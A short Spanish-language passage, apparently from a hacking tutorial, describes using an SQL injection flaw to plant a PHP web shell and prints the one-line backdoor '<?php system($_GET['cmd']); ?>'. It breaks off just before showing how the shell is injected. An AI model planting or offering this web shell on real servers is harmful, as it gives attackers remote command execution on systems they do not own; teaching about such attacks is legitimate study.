En este caso vamos a aprovechar un error de sql inyection para poder “saltar” a otras vulnerabilidades.
Después de tener la ruta, lo que vamos a hacer es inyectar la shell, en este caso es una simple backdoor en php:
‘<?php system($_GET[“cmd”]); ?>’
Lo vamos a inyectar usando: